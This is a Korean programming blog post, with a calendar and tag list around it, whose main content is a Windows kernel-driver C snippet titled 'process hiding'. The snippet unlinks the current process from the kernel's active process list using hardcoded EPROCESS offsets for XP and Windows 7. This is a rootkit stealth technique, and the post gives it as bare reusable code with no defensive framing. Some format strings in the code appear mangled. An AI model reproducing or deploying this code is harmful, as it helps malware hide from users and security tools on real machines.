| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | |||
| 5 | 6 | 7 | 8 | 9 | 10 | 11 |
| 12 | 13 | 14 | 15 | 16 | 17 | 18 |
| 19 | 20 | 21 | 22 | 23 | 24 | 25 |
| 26 | 27 | 28 | 29 | 30 | 31 |
- DHCP 설치
- 이 컴퓨터는 도메인의 구성원이 아닙니다.
- 온 프레미스
- 클라우드 소비자
- VMware
- IT 자원
- 도메인 사용자 또는 그룹을 확인할 수 없습니다.
- 클라우드 서비스 소유자
- 가상 프라이빗 클라우드
- 멀티테넌시
- 초대장 배포
- Error 1720
- 초대장 나눠드립니다.
- 티스토리 초대장
- dhcp
- 자원 풀링
- 클라우드 자원 관리자
- Community Cloud
- Virtual Private Cloud
- 온디맨드식
- 초대장 나눠드립니다
- 수평적 확장
- 클라우드 제공자
- 고정 IP주소를 가진 네트워크 어댑터를 검색할 수 없습니다.
- 커뮤니티 클라우드
- 클라우드 보안 취약성
- 제한된 이식성
- 수직적 확장
- 운영관리제어의 축소
- 티스토리 초대장삭제
- Today
- Total
한 걸음씩..
프로세스 숨기기 본문
#define XP_EPROC_OFFSET 0x88
#define WIN7_EPROC_OFFSET 0xb8
// Process Hide
ULONG eproc = 0;
PLIST_ENTRY plist_active_procs = NULL;
RTL_OSVERSIONINFOW OsVersionInfo = { 0, };
NTSTATUS NtStatus = STATUS_SUCCESS;
eproc = (ULONG) PsGetCurrentProcess();
if ( eproc <= 0 )
{
goto IOMANCREATECLOSE__GOTO_END;
}
OsVersionInfo.dwOSVersionInfoSize = sizeof( RTL_OSVERSIONINFOW );
NtStatus = RtlGetVersion( &OsVersionInfo );
if( !NT_SUCCESS(NtStatus) )
{
DbgPrint( "IOMANCreateClose : RtlGetVersion Error : 0xx \n", NtStatus );
goto IOMANCREATECLOSE__GOTO_END;
}
else
{
DbgPrint( "MJ : 0xx, MN : 0xx \n", OsVersionInfo.dwMajorVersion, OsVersionInfo.dwMinorVersion );
// WIN7
if ( (OsVersionInfo.dwMajorVersion == OS_MJ_VERSION__WIN7) && (OsVersionInfo.dwMinorVersion == 1) )
{
plist_active_procs = (LIST_ENTRY *)(eproc+WIN7_EPROC_OFFSET); // FLINKOFFSET
}
// XP 일 경우
else if ( OsVersionInfo.dwMajorVersion == OS_MJ_VERSION__XP )
{
plist_active_procs = (LIST_ENTRY *)(eproc+XP_EPROC_OFFSET); // FLINKOFFSET
}
*((ULONG *)plist_active_procs->Blink) = (ULONG) plist_active_procs->Flink;
*((ULONG *)plist_active_procs->Flink+1) = (ULONG) plist_active_procs->Blink;
plist_active_procs->Flink = (LIST_ENTRY *)&(plist_active_procs->Flink);
plist_active_procs->Blink = (LIST_ENTRY *)&(plist_active_procs->Flink);
}
'프로그래밍' 카테고리의 다른 글
| [Windows]윈도우 부팅이 안될 때 (0) | 2013.08.28 |
|---|---|
| WideChar , Multibyte 변환 시 주의 할점 (1) | 2013.08.08 |
| 드라이버 사용 기간 제한 하기! (시간 함수 사용) (0) | 2013.07.21 |
| PCI Driver - IRP_MN_START_DEVICE 에서 주의 할 점 (0) | 2013.07.20 |
| Keyboard Memory Dump 발생시키기 (0) | 2013.07.19 |
